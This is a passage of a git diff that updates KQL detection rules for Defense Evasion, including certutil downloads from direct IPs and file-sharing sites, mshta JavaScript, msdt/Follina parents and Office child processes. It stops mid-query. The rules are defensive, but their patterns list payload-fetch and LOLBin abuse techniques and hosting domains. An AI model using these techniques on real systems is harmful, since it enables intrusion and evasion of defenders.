Application -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-09 -// Level: high -// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote. -// - Occasional FPs might occur if OneNote is used internally to share different embedded documents - -DeviceFileEvents +// Title: Suspicious File Created Via OneNote Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-09 +// Level: high +// Description: Detects suspicious files created via the OneNote application. This could indicate a potential malicious ".one"/".onepkg" file was executed as seen being used in malware activity in the wild +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - False positives should be very low with the extensions list cited. Especially if you don't heavily utilize OneNote. +// - Occasional FPs might occur if OneNote is used internally to share different embedded documents + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenotem.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe") and FolderPath contains "\\AppData\\Local\\Temp\\OneNote\\" and (FolderPath endswith ".bat" or FolderPath endswith ".chm" or FolderPath endswith ".cmd" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".htm" or FolderPath endswith ".html" or FolderPath endswith ".js" or FolderPath endswith ".lnk" or FolderPath endswith ".ps1" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs" or FolderPath endswith ".wsf") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql index 086d74c8..9ec0b518 100644 --- a/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql +++ b/KQL/rules/Defense Evasion/suspicious_file_creation_in_uncommon_appdata_folder.kql @@ -1,12 +1,12 @@ -// Title: Suspicious File Creation In Uncommon AppData Folder -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: high -// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution -// False Positives: -// - Unlikely - -DeviceFileEvents +// Title: Suspicious File Creation In Uncommon AppData Folder +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution +// False Positives: +// - Unlikely + +DeviceFileEvents | where (FolderPath contains "\\AppData\\" and (FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cpl" or FolderPath endswith ".dll" or FolderPath endswith ".exe" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".lnk" or FolderPath endswith ".msi" or FolderPath endswith ".ps1" or FolderPath endswith ".psm1" or FolderPath endswith ".scr" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and FolderPath startswith "C:\\Users\\") and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\AppData\\LocalLow\\" or FolderPath contains "\\AppData\\Roaming\\") and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql index 5ba94f04..9a163806 100644 --- a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_direct_ip_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: high -// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: Suspicious File Downloaded From Direct IP Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where ((ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")) and (not(ProcessCommandLine contains "://7-")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql index 9ea93132..40db540a 100644 --- a/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_file_downloaded_from_file_sharing_website_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-02-15 -// Level: high -// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-02-15 +// Level: high +// Description: Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where (ProcessCommandLine contains "urlcache " or ProcessCommandLine contains "verifyctl ") and (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "pages.dev" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "trycloudflare.com" or ProcessCommandLine contains "ufile.io" or ProcessCommandLine contains "w3spaces.com" or ProcessCommandLine contains "workers.dev") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql index b4f891fd..e3b0c584 100644 --- a/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_file_encoded_to_base64_via_certutil_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious File Encoded To Base64 Via Certutil.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-15 -// Level: high -// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027 - -DeviceProcessEvents +// Title: Suspicious File Encoded To Base64 Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: high +// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents | where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode" or ProcessCommandLine contains "–encode" or ProcessCommandLine contains "—encode" or ProcessCommandLine contains "―encode") and (ProcessCommandLine contains ".acl" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".mp3" or ProcessCommandLine contains ".pdf" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".tmp" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql index 24a29b1e..4d442bf7 100644 --- a/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql +++ b/KQL/rules/Defense Evasion/suspicious_files_in_default_gpo_folder.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Files in Default GPO Folder -// Author: elhoim -// Date: 2022-04-28 -// Level: medium -// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder -// MITRE Tactic: Defense Evasion -// Tags: attack.t1036.005, attack.defense-evasion - -DeviceFileEvents +// Title: Suspicious Files in Default GPO Folder +// Author: elhoim +// Date: 2022-04-28 +// Level: medium +// Description: Detects the creation of copy of suspicious files (EXE/DLL) to the default GPO storage folder +// MITRE Tactic: Defense Evasion +// Tags: attack.t1036.005, attack.defense-evasion + +DeviceFileEvents | where FolderPath contains "\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\" and (FolderPath endswith ".dll" or FolderPath endswith ".exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql index 3947f385..3f6ef8ad 100644 --- a/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql +++ b/KQL/rules/Defense Evasion/suspicious_hh_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious HH.EXE Execution -// Author: Maxim Pavlunin -// Date: 2020-04-01 -// Level: high -// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 - -DeviceProcessEvents +// Title: Suspicious HH.EXE Execution +// Author: Maxim Pavlunin +// Date: 2020-04-01 +// Level: high +// Description: Detects a suspicious execution of a Microsoft HTML Help (HH.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.initial-access, attack.t1047, attack.t1059.001, attack.t1059.003, attack.t1059.005, attack.t1059.007, attack.t1218, attack.t1218.001, attack.t1218.010, attack.t1218.011, attack.t1566, attack.t1566.001 + +DeviceProcessEvents | where (ProcessVersionInfoOriginalFileName =~ "HH.exe" or FolderPath endswith "\\hh.exe") and (ProcessCommandLine contains ".application" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Content.Outlook\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql index affa996f..3ba59dad 100644 --- a/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql +++ b/KQL/rules/Defense Evasion/suspicious_high_integritylevel_conhost_legacy_option.kql @@ -1,12 +1,12 @@ -// Title: Suspicious High IntegrityLevel Conhost Legacy Option -// Author: frack113 -// Date: 2022-12-09 -// Level: informational -// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1202 -// False Positives: -// - Very Likely, including launching cmd.exe via Run As Administrator - -DeviceProcessEvents +// Title: Suspicious High IntegrityLevel Conhost Legacy Option +// Author: frack113 +// Date: 2022-12-09 +// Level: informational +// Description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Very Likely, including launching cmd.exe via Run As Administrator + +DeviceProcessEvents | where (ProcessCommandLine contains "conhost.exe" and ProcessCommandLine contains "0xffffffff" and ProcessCommandLine contains "-ForceV1") and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql index 550eac24..279b5fc7 100644 --- a/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql +++ b/KQL/rules/Defense Evasion/suspicious_iis_url_globalrules_rewrite_via_appcmd.kql @@ -1,12 +1,12 @@ -// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-22 -// Level: medium -// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion -// False Positives: -// - Legitimate usage of appcmd to add new URL rewrite rules - -DeviceProcessEvents +// Title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-22 +// Level: medium +// Description: Detects usage of "appcmd" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of appcmd to add new URL rewrite rules + +DeviceProcessEvents | where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:system.webServer/rewrite/globalRules" and ProcessCommandLine contains "commit:") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql index 3fa20937..c61b1951 100644 --- a/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql +++ b/KQL/rules/Defense Evasion/suspicious_javascript_execution_via_mshta_exe.kql @@ -1,10 +1,10 @@ -// Title: Suspicious JavaScript Execution Via Mshta.EXE -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Detects execution of javascript code using "mshta.exe". -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.005 - -DeviceProcessEvents +// Title: Suspicious JavaScript Execution Via Mshta.EXE +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detects execution of javascript code using "mshta.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005 + +DeviceProcessEvents | where ProcessCommandLine contains "javascript" and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql index 1bdd6395..ac7926f6 100644 --- a/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql +++ b/KQL/rules/Defense Evasion/suspicious_lnk_double_extension_file_created.kql @@ -1,12 +1,12 @@ -// Title: Suspicious LNK Double Extension File Created -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2022-11-07 -// Level: medium -// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.007 -// False Positives: -// - Some tuning is required for other general purpose directories of third party apps - -DeviceFileEvents +// Title: Suspicious LNK Double Extension File Created +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2022-11-07 +// Level: medium +// Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.007 +// False Positives: +// - Some tuning is required for other general purpose directories of third party apps + +DeviceFileEvents | where ((FolderPath contains ".doc." or FolderPath contains ".docx." or FolderPath contains ".jpg." or FolderPath contains ".pdf." or FolderPath contains ".ppt." or FolderPath contains ".pptx." or FolderPath contains ".xls." or FolderPath contains ".xlsx.") and FolderPath endswith ".lnk") and (not(FolderPath contains "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\")) and (not(((InitiatingProcessFolderPath endswith "\\excel.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Excel") or (InitiatingProcessFolderPath endswith "\\powerpnt.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\PowerPoint") or ((InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\") or (InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\AppData\\Roaming\\Microsoft\\Word")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql index c7d27d6a..168bfa13 100644 --- a/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_microsoft_office_child_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Microsoft Office Child Process -// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io -// Date: 2018-04-06 -// Level: high -// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 - -DeviceProcessEvents +// Title: Suspicious Microsoft Office Child Process +// Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io +// Date: 2018-04-06 +// Level: high +// Description: Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", "RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql index 3cd23e51..1b4c62a9 100644 --- a/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_msbuild_execution_by_uncommon_parent_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Msbuild Execution By Uncommon Parent Process -// Author: frack113 -// Date: 2022-11-17 -// Level: medium -// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious Msbuild Execution By Uncommon Parent Process +// Author: frack113 +// Date: 2022-11-17 +// Level: medium +// Description: Detects suspicious execution of 'Msbuild.exe' by a uncommon parent process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (FolderPath endswith "\\MSBuild.exe" or ProcessVersionInfoOriginalFileName =~ "MSBuild.exe") and (not((InitiatingProcessFolderPath endswith "\\devenv.exe" or InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\msbuild.exe" or InitiatingProcessFolderPath endswith "\\python.exe" or InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\nuget.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql index 14601d2d..342a5044 100644 --- a/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_msdt_parent_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious MSDT Parent Process -// Author: Nextron Systems -// Date: 2022-06-01 -// Level: high -// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036, attack.t1218 - -DeviceProcessEvents +// Title: Suspicious MSDT Parent Process +// Author: Nextron Systems +// Date: 2022-06-01 +// Level: high +// Description: Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1218 + +DeviceProcessEvents | where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\schtasks.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql index 15cd1ac7..7c4b4a5b 100644 --- a/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql +++ b/KQL/rules/Defense Evasion/suspicious_mshta_child_process.kql @@ -1,13 +1,13 @@ -// Title: Suspicious MSHTA Child Process -// Author: Michael Haag -// Date: 2019-01-16 -// Level: high -// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003 -// False Positives: -// - Printer software / driver installations -// - HP software - -DeviceProcessEvents +// Title: Suspicious MSHTA Child Process +// Author: Michael Haag +// Date: 2019-01-16 +// Level: high +// Description: Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005, car.2013-02-003, car.2013-03-001, car.2014-04-003 +// False Positives: +// - Printer software / driver installations +// - HP software + +DeviceProcessEvents | where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\bitsadmin.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll", "wscript.exe", "cscript.exe", "Bash.exe", "reg.exe", "REGSVR32.EXE", "bitsadmin.exe"))) and InitiatingProcessFolderPath endswith "\\mshta.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql index e645f938..0a793859 100644 --- a/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql +++ b/KQL/rules/Defense Evasion/suspicious_msiexec_embedding_parent.kql @@ -1,10 +1,10 @@ -// Title: Suspicious MsiExec Embedding Parent -// Author: frack113 -// Date: 2022-04-16 -// Level: medium -// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads -// MITRE Tactic: Defense Evasion -// Tags: attack.t1218.007, attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious MsiExec Embedding Parent +// Author: frack113 +// Date: 2022-04-16 +// Level: medium +// Description: Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads +// MITRE Tactic: Defense Evasion +// Tags: attack.t1218.007, attack.defense-evasion + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe") and (InitiatingProcessCommandLine contains "MsiExec.exe" and InitiatingProcessCommandLine contains "-Embedding ")) and (not(((ProcessCommandLine contains "C:\\Program Files\\SplunkUniversalForwarder\\bin\\" and FolderPath endswith ":\\Windows\\System32\\cmd.exe") or (ProcessCommandLine contains "\\DismFoDInstall.cmd" or (InitiatingProcessCommandLine contains 